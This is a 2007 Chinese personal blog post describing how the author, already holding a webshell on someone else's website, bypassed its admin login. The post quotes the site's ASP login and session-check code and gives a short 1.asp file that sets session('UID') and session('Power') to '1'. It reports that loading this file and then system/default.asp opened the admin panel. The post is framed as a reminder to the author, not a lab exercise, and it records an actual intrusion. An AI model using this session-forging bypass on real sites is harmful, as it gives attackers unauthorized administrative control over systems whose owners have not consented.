Evonne

    <<  ISAPI扩展初窥 | 首页 |
  • 2007-10-12

    伪造Session登陆后台 - [xxx]

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://coolevonne.blogbus.com/logs/10259467.html

    前不久拿到一个站webshell

    发现里面有个站程序还不错..可密码一直找不到..
    看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

    login.asp的验证代码

    <% dim user_name,user_password,upwr,uID,ukey,cmd,rs
    user_name=trim(request.form("uid"))
    user_password=trim(request.form("pwd"))
    user_password=jk_md5(user_password,"long")
    if user_name="" or user_password="" then
    close_conn
    response.redirect "../global/systeminfo.asp?flag=1"
    end if
    如果用户和密码为空就返回global/systeminfo.asp?flag=1 这个页面提示"错误帐号或密码,请重新登陆"
    在往下看代码

    session("UID")=rs("UserName")
    session("power")=rs("Power")
    Session("PSW")=rs("PSW")
    rs.close:set rs=Nothing
    set cmd=Nothing
    close_conn
    response.redirect("../system/default.asp")

    如果UID,,power.PSW不为空就返回system/default.asp登陆成功

    checkuser.asp代码为
    <%

    if session("UID")="" then
    response.redirect "../gobal/systeminfo.asp?flag=1"
    response.end
    end if
    %>

    session("UID")为空同样返回gobal/systeminfo.asp?flag=1
    那也就是说只要UID参数不为空就登陆成功

    然后把以下代码保存为1.asp

    <%
    session("UID")="1"
    Session("Power")="1"
    %>

    先访问1.asp..然后再访问后台system/default.asp..绕过了验证..看到了后台管理页面

    记录下..省的以后又忘记了


    历史上的今天:

    ISAPI扩展初窥 2007-10-12
    如何安装Ubuntu Linux 2007-10-12
    完美卸载IIS 2007-10-12
    IIS错误 安装程序无法复制文件文件IISApp.vbs 2007-10-12
    从后台得到webshell技巧大汇总 2007-10-12

    随机文章:

    ISAPI扩展初窥 2007-10-12
    一次Win2003服务器下的完全克隆 2007-10-12
    Exploit基本概念 2007-10-12
    google hacking的实现以及应用 2007-10-12
    端口你了解多少 2007-10-12

    收藏到:Del.icio.us




    Tag:
    引用地址:
    coolevonne 发表于21:58:52 | 编辑 | 继续话题 | 转发 | 分享 0

个人资料

coolevonne

日历

搜索

管理

  • 进入后台 写新日志
  • 文章管理 评论管理
  • 更换模板 访问统计

文章分类

  • xxx[24]
  • L.I.F.E[4]
  • O.T.H.E.R[7]
  • music[1]

Tag

    More..

    最新文章

    • 伪造Session登陆后台
    • ISAPI扩展初窥
    • 如何安装Ubuntu Linux
    • 完美卸载IIS
    • IIS错误 安装程序无法复制文件文件IISApp.vbs
    • 从后台得到webshell技巧大汇总
    • Better Man lrc
    • 一次Win2003服务器下的完全克隆
    • 经典问题解决办法希望大家可以学习
    • 入侵渗透思路
    全部日志>>

    最新评论

      链接

        存档

        • 2007 [36]
        • RSS 什么是RSS?
          用IM提醒我内容更新
          订阅到QQ邮箱
          订阅到鲜果阅读器
          订阅到Google阅读器
          订阅到抓虾阅读器
        • 《城客》第四期:创意之城
          博客大巴
          博客大巴使用指南
          博客大巴模板中心
          免费注册博客大巴
          一键博客搬家工具
          中文互动杂志城客
        Copyright © 2002-2009 BlogBus.com, All Rights Reserved. 博客大巴 版权所有
        博客大巴模板设计:简约风格2 | 作者: innocent_sin